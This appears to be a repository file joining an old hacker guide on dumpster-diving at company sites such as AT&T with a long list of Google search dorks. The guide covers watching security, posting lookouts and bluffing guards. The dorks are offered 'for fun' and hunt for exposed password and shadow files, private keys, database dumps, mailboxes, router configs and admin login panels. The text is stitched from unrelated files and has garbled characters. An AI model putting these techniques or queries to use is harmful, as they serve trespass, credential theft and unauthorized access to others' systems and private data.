THE ART OF TRASHING
-------------------
Before attempting to trash a certain place (for example, I will use a
local AT&T building), you might find it useful to follow the "rules" of the
trasher.
Before you begin to dive into the nearest dumpster, first find out about the
security (if any) by watching the building for a few days and take notes on
what goes on, in, and around the building. Next, find out the garbage
truck(s) route and schedule so you can trash at the most beneficial times.
To truly trash, you must be willing to climb into the trash dumpster(s) and
be prepared to dig for the "gold." You must climb all the way in and dig
around because most of the important trash is usually at the bottom (huge
print-outs, heavy memo books, etc). You cannot just run over and reach for
the nearest bag, you might find something useful but most probably you will
find someones used coffee cup.
After removing the trash you think you might find interesting, do not rummage
thru the selected garbage there, wait till you are in a secluded spot, a
forest or your home (only if you live nearby because the trash can be very
heavy if you don't have a car) for example.
GETTING CAUGHT
--------------
The probability of getting caught is very slim (except for AT&T offices
and things of that sort). Here is a true life example:
It was a cold and dark night and a few friends and I were only on our seventh
time of trashing. All was cool until, from a distant side door a guard came
running out to see what we were doing. Having been surprised and having no
way of escaping (I was buried deep in the garbage and certainly had no chance
to escape), we waited for the guard to arrive. the guard rushed over and
said, "What are you doing here? This is private property!"
After looking at me and doing a double take he then added, "What the hell are
you doing in there???" We were quite nervous and after about a minute or so
one of my friends said, "Oh, we were just walking thru the forest and we
took a short cut thru here." I thought that that was a stupid thing to say
becuase why would we take a short cut thru a trash dumpster?!! To my
surprise, however, the guard said, "Well, OK, but don't come around here
again or you will be arrested!" We left and returned the next day for a
successful night.
WHAT THEY CAN DO
----------------
If you ever get caught, they (the company - usually security) will most
probably let you go and not do anything about it because it sounds pretty
funny saying, "I want him (them) prosecuted for taking out the garbage!" The
only thing they can really do is to get you for trespassing which they don't
usually do to nice kids anyway, although AT&T has been known to prosecute
anyone caught in their garbage.
COMMENTS
--------
Most of the time, you don't have to worry about food and other
interesting trash (except if you like to recycle used food and in that case
you are probably too fat to fit in a trash dumpster) because big companies
usually have separate dumpsters for cafeteria food.
I recommend that you trash with as many people as you can because it will be
much quicker and safer because some people can be "look outs" (do not trash
with over seven people though, because it begins to get noisy). Don't feel
threatened by bright security lights or guards, they are usually easy to
avoid and since there are not usually bright lights near or on the trash
dumpsters, you will be home free.
Of course, all of the above does not count for AT&T. AT&T has since become
aware of the trasher and has one or even all of the following securities:
(1) A lock on the trash dumpster.
(2) Dumpsters flooded by bright security lights.
(3) Guards located near or sometimes at the dumpsters.
(4) Fence and barbed wire enclosing dumpsters.
(5) Shredded garbage (the trasher's worst nightmare)
There are more, but these are the most popular.
Trashing is an art, so if at first you don't succeed, trash, trash again.
rash again

777
src/Security/Technical Papers and Notes/Docs/Super Google Hacks.txt Normal file
View File

@@ -0,0 +1,777 @@
Each of these things can be copied and pasted into Google search for some good old fashioned fun! Enjoy!
admin account info” filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
“# -FrontPage-” ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-” inurl:service.pwd
“AutoCreate=TRUE password=*”
“http://*:*@www” domainname
“index of/” “ws_ftp.ini” “parent directory”
“liveice configuration file” ext:cfg -site:sourceforge.net
“parent directory” +proftpdpasswd
Duclassified” -site:duware.com “DUware All Rights reserved”
duclassmate” -site:duware.com
Dudirectory” -site:duware.com
dudownload” -site:duware.com
Elite Forum Version *.*”
Link Department”
“sets mode: +k”
“your password is” filetype:log
DUpaypal” -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret “current configuration” -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -”uid..pwd” database | server | dsn
ext:inc “pwd=” “UID=”
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:”htaccess|passwd|shadow|htusers”
filetype:cfg mrtg “target
filetype:cfm “cfapplication name” password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings “User ID”
filetype:dat “password.dat”
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:”serv-u.ini”
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log “See `ipsec copyright”
filetype:log inurl:”password.log”
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql “insert into” (pass|passwd|password)
filetype:sql (“values * MD5″ | “values * password” | “values * encrypt”)
filetype:sql +”IDENTIFIED BY” -cvs
filetype:sql password
filetype:url +inurl:”ftp://” +inurl:”;@”
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:”enable password 7″
intext:”enable secret 5 $”
intext:”EZGuestbook”
intext:”Web Wiz Journal”
intitle:”index of” intext:connect.inc
intitle:”index of” intext:globals.inc
intitle:”Index of” passwords modified
intitle:”Index of” sc_serv.conf sc_serv content
intitle:”phpinfo()” +”mysql.default_password” +”Zend s?ri?ting Language Engine”
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:”secring.skr”|”secring.pgp”|”secring.bak”
intitle:rapidshare intext:login
inurl:”calendars?ri?t/users.txt”
inurl:”editor/list.asp” | inurl:”database_editor.asp” | inurl:”login.asa” “are set”
inurl:”GRC.DAT” intext:”password”
inurl:”Sites.dat”+”PASS=”
inurl:”slapd.conf” intext:”credentials” -manpage -”Manual Page” -man: -sample
inurl:”slapd.conf” intext:”rootpw” -manpage -”Manual Page” -man: -sample
inurl:”wvdial.conf” intext:”password”
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:”index.of./” sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs “intitle:index of”
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:”remote assessment” OpenAanval Console
intitle:opengroupware.org “resistance is obsolete” “Report Bugs” “Username” “password”
“bp blog admin” intitle:login | intitle:admin -site:johnny.ihackstuff.com
“Emergisoft web applications are a part of our”
“Establishing a secure Integrated Lights Out session with” OR intitle:”Data Frame Browser not HTTP 1.1 compatible” OR intitle:”HP Integrated Lights-
“HostingAccelerator” intitle:”login” +”Username” -”news” -demo
“iCONECT 4.1 :: Login”
“IMail Server Web Messaging” intitle:login
“inspanel” intitle:”login” -”cannot” “Login ID” -site:inspediumsoft.com
“intitle:3300 Integrated Communications Platform” inurl:main.htm
“Login Sun Cobalt RaQ”
“login prompt” inurl:GM.cgi
“Login to Usermin” inurl:20000
“Microsoft CRM : Unsupported Browser Version”
“OPENSRS Domain Management” inurl:manage.cgi
“pcANYWHERE EXPRESS Java Client”
“Please authenticate yourself to get access to the management interface”
“please log in”
“Please login with admin pass” -”leak” -sourceforge
CuteNews” “2003..2005 CutePHP”
DWMail” password intitle:dwmail
Merak Mail Server Software” -.gov -.mil -.edu -site:merakmailserver.com
Midmart Messageboard” “Administrator Login”
Monster Top List” MTL numrange:200-
UebiMiau” -site:sourceforge.net
“site info for” “Enter Admin Password”
“SquirrelMail version” “By the SquirrelMail development Team”
“SysCP login”
“This is a restricted Access Server” “Javas?ri?t Not Enabled!”|”Messenger Express” -edu -ac
“This section is for Administrators only. If you are an administrator then please”
“ttawlogin.cgi/?action=”
“VHCS Pro ver” -demo
“VNC Desktop” inurl:5800
“Web-Based Management” “Please input password to login” -inurl:johnny.ihackstuff.com
“WebExplorer Server Login” “Welcome to WebExplorer Server”
“WebSTAR Mail Please Log In”
“You have requested access to a restricted area of our website. Please authenticate yourself to continue.”
“You have requested to access the management functions” -.edu
(intitle:”Please login Forums
UBB.threads”)|(inurl:login.php “ubb”)
(intitle:”Please login Forums
WWWThreads”)|(inurl:”wwwthreads/login.php”)|(inurl:”wwwthreads/login.pl?Cat=”)
(intitle:”rymo Login”)|(intext:”Welcome to rymo”) -family
(intitle:”WmSC e-Cart Administration”)|(intitle:”WebMyStyle e-Cart Administration”)
(inurl:”ars/cgi-bin/arweb?O=0″ | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:”Welcome to the Cyclades”
allinurl:”exchange/logon.asp”
allinurl:wps/portal/ login
ASP.login_aspx “ASP.NET_SessionId”
CGI:IRC Login
ext:cgi intitle:”control panel” “enter your owner password to continue!”
ez Publish administration
filetype:php inurl:”webeditor.php”
filetype:pl “Download: SuSE Linux Openexchange Server CA”
filetype:r2w r2w
intext:”"BiTBOARD v2.0″ BiTSHiFTERS Bulletin Board”
intext:”Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.” -edu
intext:”Mail admins login here to administrate your domain.”
intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin
intext:”Master Account” “Domain Name” “Password” inurl:/cgi-bin/qmailadmin
intext:”Storage Management Server for” intitle:”Server Administration”
intext:”Welcome to” inurl:”cp” intitle:”H-SPHERE” inurl:”begin.html” -Fee
intext:”vbulletin” inurl:admincp
intitle:”*- HP WBEM Login” | “You are being prompted to provide login account information for *” | “Please provide the information requested and press
intitle:”Admin Login” “admin login” “blogware”
intitle:”Admin login” “Web Site Administration” “Copyright”
intitle:”AlternC Desktop”
intitle:”Athens Authentication Point”
intitle:”b2evo > Login form” “Login form. You must log in! You will have to accept cookies in order to log in” -demo -site:b2evolution.net
intitle:”Cisco CallManager User Options Log On” “Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:”ColdFusion Administrator Login”
intitle:”communigate pro * *” intitle:”entrance”
intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
intitle:”Content Management System” “user name”|”password”|”admin” “Microsoft IE 5.5″ -mambo
intitle:”Dell Remote Access Controller”
intitle:”Docutek ERes Admin Login” -edu
intitle:”Employee Intranet Login”
intitle:”eMule *” intitle:”- Web Control Panel” intext:”Web Control Panel” “Enter your password here.”
intitle:”ePowerSwitch Login”
intitle:”eXist Database Administration” -demo
intitle:”EXTRANET * Identification”
intitle:”EXTRANET login” -.edu -.mil -.gov
intitle:”EZPartner” -netpond
intitle:”Flash Operator Panel” -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:”i-secure v1.1″ -edu
intitle:”Icecast Administration Admin Page”
intitle:”iDevAffiliate admin” -demo
intitle:”ISPMan : Unauthorized Access prohibited”
intitle:”ITS System Information” “Please log on to the SAP System”
intitle:”Kurant Corporation StoreSense” filetype:bok
intitle:”ListMail Login” admin -demo
intitle:”Login -
Easy File Sharing Web Server”
intitle:”Login Forum
AnyBoard” intitle:”If you are a new user:” intext:”Forum
AnyBoard” inurl:gochat -edu
intitle:”Login to @Mail” (ext:pl | inurl:”index”) -dwaffleman
intitle:”Login to Cacti”
intitle:”Login to the forums @www.aimoo.com” inurl:login.cfm?id=
intitle:”MailMan Login”
intitle:”Member Login” “NOTE: Your browser must have cookies enabled in order to log into the site.” ext:php OR ext:cgi
intitle:”Merak Mail Server Web Administration” -ihackstuff.com
intitle:”microsoft certificate services” inurl:certsrv
intitle:”MikroTik RouterOS Managing Webpage”
intitle:”MX Control Console” “If you cant remember”
intitle:”Novell Web Services” “GroupWise” -inurl:”doc/11924″ -.mil -.edu -.gov -filetype:pdf
intitle:”Novell Web Services” intext:”Select a service and a language.”
intitle:”oMail-admin Administration Login” -inurl:omnis.ch
intitle:”OnLine Recruitment Program Login”
intitle:”Philex 0.2*” -s?ri?t -site:freelists.org
intitle:”PHP Advanced Transfer” inurl:”login.php”
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”php icalendar administration” -site:sourceforge.net
intitle:”phpPgAdmin Login” Language
intitle:”PHProjekt login” login password
intitle:”please login” “your password is *”
intitle:”Remote Desktop Web Connection” inurl:tsweb
intitle:”SFXAdmin sfx_global” | intitle:”SFXAdmin sfx_local” | intitle:”SFXAdmin sfx_test”
intitle:”SHOUTcast Administrator” inurl:admin.cgi
intitle:”site administration: please log in” “site designed by emarketsouth”
intitle:”Supero Doctor III” -inurl:supermicro
intitle:”SuSE Linux Openexchange Server” “Please activate Javas?ri?t!”
intitle:”teamspeak server-administration
intitle:”Tomcat Server Administration”
intitle:”TOPdesk ApplicationServer”
intitle:”TUTOS Login”
intitle:”TWIG Login”
intitle:”vhost” intext:”vHost . 2000-2004″
intitle:”Virtual Server Administration System”
intitle:”VisNetic WebMail” inurl:”/mail/”
intitle:”VitalQIP IP Management System”
intitle:”VMware Management Interface:” inurl:”vmware/en/”
intitle:”VNC viewer for Java”
intitle:”web-cyradm”|”by Luc de Louw” “This is only for authorized users” -tar.gz -site:web-cyradm.org
intitle:”WebLogic Server” intitle:”Console Login” inurl:console
intitle:”Welcome Site/User Administrator” “Please select the language” -demos
intitle:”Welcome to Mailtraq WebMail”
intitle:”welcome to netware *” -site:novell.com
intitle:”WorldClient” intext:”? (2003|2004) Alt-N Technologies.”
intitle:”xams 0.0.0..15 Login”
intitle:”XcAuctionLite” | “DRIVEN BY XCENT” Lite inurl:admin
intitle:”XMail Web Administration Interface” intext:Login intext:password
intitle:”Zope Help System” inurl:HelpSys
intitle:”ZyXEL Prestige Router” “Enter password”
intitle:”inc. vpn 3000 concentrator”
intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office “Enter your username and password to login”
intitle:ilohamail ”
IlohaMail”
intitle:ilohamail intext:”Version 0.8.10″ ”
IlohaMail”
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:”RT is ? Copyright”
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess “Copyright *-* Novell, Inc”
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:”/admin/configuration. php?” Mystore
inurl:”/slxweb.dll/external?name=(custportal|webticketcust)”
inurl:”1220/parse_xml.cgi?”
inurl:”631/admin” (inurl:”op=*”) | (intitle:CUPS)
inurl:”:10000″ intext:webmin
inurl:”Activex/default.htm” “Demo”
inurl:”calendar.asp?action=login”
inurl:”default/login.php” intitle:”kerio”
inurl:”gs/adminlogin.aspx”
inurl:”php121login.php”
inurl:”suse/login.pl”
inurl:”typo3/index.php?u=” -demo
inurl:”usysinfo?login=true”
inurl:”utilities/TreeView.asp”
inurl:”vsadmin/login” | inurl:”vsadmin/admin” inurl:.php|.asp
Code:
nurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:”Miva Merchant Administration Login” -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:”Microsoft Software upd?t? Services”
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 “Oracle Enterprise Manager”
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator “welcome to mambo”
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:”WebCommander”
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php “SquirrelMail version”
inurl:metaframexp/default/login.asp | intitle:”Metaframe XP Login”
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:”postfix admin” ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl “Interface”
inurl:webvpn.html “login” “Please enter your”
Login (”
Jetbox One CMS â?¢” | ”
Jetstream ? *”)
Novell NetWare intext:”netware management portal version”
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin
INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:”DocuShare” inurl:”docushare/dsweb/” -faq -gov -edu
“#mysql dump” filetype:sql
“#mysql dump” filetype:sql 21232f297a57a5a743894a0e4a801fc3
“allow_call_time_pass_reference” “PATH_INFO”
“Certificate Practice Statement” inurl:(PDF | DOC)
“Generated by phpSystem”
“generated by wwwstat”
“Host Vulnerability Summary Report”
“HTTP_FROM=googlebot” googlebot.com “Server_Software=”
“Index of” / “chat/logs”
“Installed Objects Scanner” inurl:default.asp
“MacHTTP” filetype:log inurl:machttp.log
“Mecury Version” “Infastructure Group”
“Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)” ext:log
“Most Submitted Forms and s?ri?ts” “this section”
“Network Vulnerability Assessment Report”
“not for distribution” confidential
“not for public release” -.edu -.gov -.mil
“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
“phpMyAdmin” “running on” inurl:”main.php”
“produced by getstats”
“Request Details” “Control Tree” “Server Variables”
“robots.txt” “Disallow:” filetype:txt
“Running in Child mode”
“sets mode: +p”
“sets mode: +s”
“Thank you for your order” +receipt
“This is a Shareaza Node”
“This report was generated by WebLog”
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:”PRTG Traffic Grapher” inurl:”allsensors”)|(intitle:”PRTG Traffic Grapher Monitoring Results”)
(intitle:WebStatistica inurl:main.php) | (intitle:”WebSTATISTICA server”) -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:”robot.txt” | inurl:”robots.txt” ) intext:disallow filetype:txt
+”:8080″ +”:3128″ +”:80″ filetype:txt
+”HSTSNR” -”netop.com”
-site:php.net -”The PHP Group” inurl:source inurl:url ext:pHp
94FBR “ADOBE PHOTOSHOP”
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:”budget approved”) inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log “Software: Microsoft Internet Information Services *.*”
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg “username=*” putty
ext:txt “Final encryption key”
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=” * Server.MapPath(“*.mdb”)
filetype:bkf bkf
filetype:blt “buddylist”
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -”cvs log”
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:”outlook.pst”
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg “Terminal Server Client”
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:”email.xls”
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please…
intext:”Session Start * * * *:*:* *” filetype:log
intext:”Tobias Oetiker” “traffic analysis”
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:”admin panel” +”
RedKernel”
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:”AppServ Open Project” -site:www.appservnetwork.com
intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”
intitle:”Big Sister” +”OK Attention Trouble”
intitle:”curriculum vitae” filetype:doc
intitle:”edna:streaming mp3 server” -forums
intitle:”FTP root at”
intitle:”index of” +myd size
intitle:”Index Of” -inurl:maillog maillog size
intitle:”Index Of” cookies.txt size
intitle:”index of” mysql.conf OR mysql_config
intitle:”Index of” upload size parent directory
intitle:”index.of *” admin news.asp configview.asp
intitle:”index.of” .diz .nfo last modified
intitle:”Joomla Web Installer”
intitle:”LOGREP Log file reporting system” -site:itefix.no
intitle:”Multimon UPS status page”
intitle:”PHP Advanced Transfer” (inurl:index.php | inurl:showrecent.php )
intitle:”PhpMyExplorer” inurl:”index.php” -cvs
intitle:”statistics of” “advanced web statistics”
intitle:”System Statistics” +”System and Network Information Center”
intitle:”urchin (5|3|admin)” ext:cgi
intitle:”Usage Statistics for” “Generated by Webalizer”
intitle:”wbem” compaq login “Compaq Information Technologies Group”
intitle:”Web Server Statistics for ****”
intitle:”web server status” SSH Telnet
intitle:”Welcome to F-Secure Policy Manager Server Welcome Page”
intitle:”welcome.to.squeezebox”
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html “Bookmarks
intitle:index.of “Apache” “server at”
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:”phone”
inurl:”/axs/ax-admin.pl” -s?ri?t
inurl:”/cricket/grapher.cgi”
inurl:”bookmark.htm”
inurl:”cacti” +inurl:”graph_view.php” +”Settings Tree View” -cvs -RPM
inurl:”newsletter/admin/”
inurl:”newsletter/admin/” intitle:”newsletter admin”
inurl:”putty.reg”
inurl:”smb.conf” intext:”workgroup” filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe “Please distribute TestCGI”
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini “[emule]”
inurl:profiles filetype:mdb
inurl:report “EVEREST Home Edition ”
inurl:server-info “Apache Server Information”
inurl:server-status “apache”
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php “page generated”
inurl:wp-mail.php + “There doesnt seem to be any new mail.”
inurl:XcCDONTS.asp
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook “This is the addressbook for *” -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
rdbqds -site:.edu -site:.mil -site:.gov
robots.txt
site:edu admin grades
site:www.mailinator.com inurl:ShowMail.do
SQL data dumps
Squid cache server reports
Unreal IRCd
WebLog Referrers
Welcome to ntop!
Fichier contenant des informations sur le r?seau :
filetype:log intext:”ConnectionManager2″
“apricot admin” 00h
“by Reimar Hoven. All Rights Reserved. Disclaimer” | inurl:”log/logdb.dta”
“Network Host Assessment Report” “Internet Scanner”
“Output produced by SysWatch *”
“Phorum Admin” “Database Connection” inurl:forum inurl:admin
phpOpenTracker” Statistics
“powered | performed by Beyond Securitys Automated Scanning” -kazaa -example
“Shadow Security Scanner performed a vulnerability assessment”
“SnortSnarf alert page”
“The following report contains confidential information” vulnerability -search
“The statistics were last upd?t?d” “Daily”-microsoft.com
“this proxy is working fine!” “enter *” “URL***” * visit
“This report lists” “identified by Internet Scanner”
“Traffic Analysis for” “RMON Port * on unit *”
“Version Info” “Boot Version” “Internet Settings”
((inurl:ifgraph “Page generated at”) OR (“This page was built using ifgraph”))
Analysis Console for Incident Databases
ext:cfg radius.cfg
ext:cgi intext:”nrg-” ” This web page was created on ”
filetype:pdf “Assessment Report” nessus
filetype:php inurl:ipinfo.php “Distributed Intrusion Detection System”
filetype:php inurl:nqt intext:”Network Query Tool”
filetype:vsd vsd network -samples -examples
intext:”Welcome to the Web V.Networks” intitle:”V.Networks [Top]” -filetype:htm
intitle:”ADSL Configuration page”
intitle:”Azureus : Java BitTorrent Client Tracker”
intitle:”Belarc Advisor Current Profile” intext:”Click here for Belarcs PC Management products, for large and small companies.”
intitle:”BNBT Tracker Info”
intitle:”Microsoft Site Server Analysis”
intitle:”Nessus Scan Report” “This file was generated by Nessus”
intitle:”PHPBTTracker Statistics” | intitle:”PHPBT Tracker Statistics”
intitle:”Retina Report” “CONFIDENTIAL INFORMATION”
intitle:”start.managing.the.device” remote pbx acc
intitle:”sysinfo * ” intext:”Generated by Sysinfo * written by The Gamblers.”
intitle:”twiki” inurl:”TWikiUsers”
inurl:”/catalog.nsf” intitle:catalog
inurl:”install/install.php”
inurl:”map.asp?” intitle:”WhatsUp Gold”
inurl:”NmConsole/Login.asp” | intitle:”Login Ipswitch WhatsUp Professional 2005″ | intext:”Ipswitch WhatsUp Professional 2005 (SP1)” “Ipswitch, Inc”
inurl:”sitescope.html” intitle:”sitescope” intext:”refresh” -demo
inurl:/adm-cfgedit.php
inurl:/cgi-bin/finger? “In real life”
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/counter/index.php intitle:”+PHPCounter 7.*”
inurl:CrazyWWWBoard.cgi intext:”detailed debugging information”
inurl:login.jsp.bak
inurl:ovcgi/jovw
inurl:phpSysInfo/ “created by phpsysinfo”
inurl:portscan.php “from Port”|”Port Range”
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
inurl:statrep.nsf -gov
inurl:status.cgi?host=all
inurl:testcgi xitami
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
inurl:webutil.pl
Looking Glass
site:netcraft.com intitle:That.Site.Running Apache
“A syntax error has occurred” filetype:ihtml
“access denied for user” “using password”
“An illegal character has been found in the statement” -”previous message”
“ASP.NET_SessionId” “data source=”
“Cant connect to local” intitle:warning
“Chatologica MetaSearch” “stack tracking”
“detected an internal error [IBM][CLI Driver][DB2/6000]”
“error found handling the request” cocoon filetype:xml
“Fatal error: Call to undefined function” -reply -the -next
“Incorrect syntax near”
“Incorrect syntax near”
“Internal Server Error” “server at”
“Invision Power Board Database Error”
“ORA-00933: SQL command not properly ended”
“ORA-12541: TNS:no listener” intitle:”error occurred”
“Parse error: parse error, unexpected T_VARIABLE” “on line” filetype:php
“PostgreSQL query failed: ERROR: parser: parse error”
“Supplied argument is not a valid MySQL result resource”
“Syntax error in query expression ” -the
“The s?ri?t whose uid is ” “is not allowed to access”
“There seems to have been a problem with the” ” Please try again by clicking the Refresh button in your web browser.”
“Unable to jump to row” “on MySQL result index” “on line”
“Unclosed quotation mark before the character string”
“Warning: Bad arguments to (join|implode) () in” “on line” -help -forum
“Warning: Cannot modify header information headers already sent”
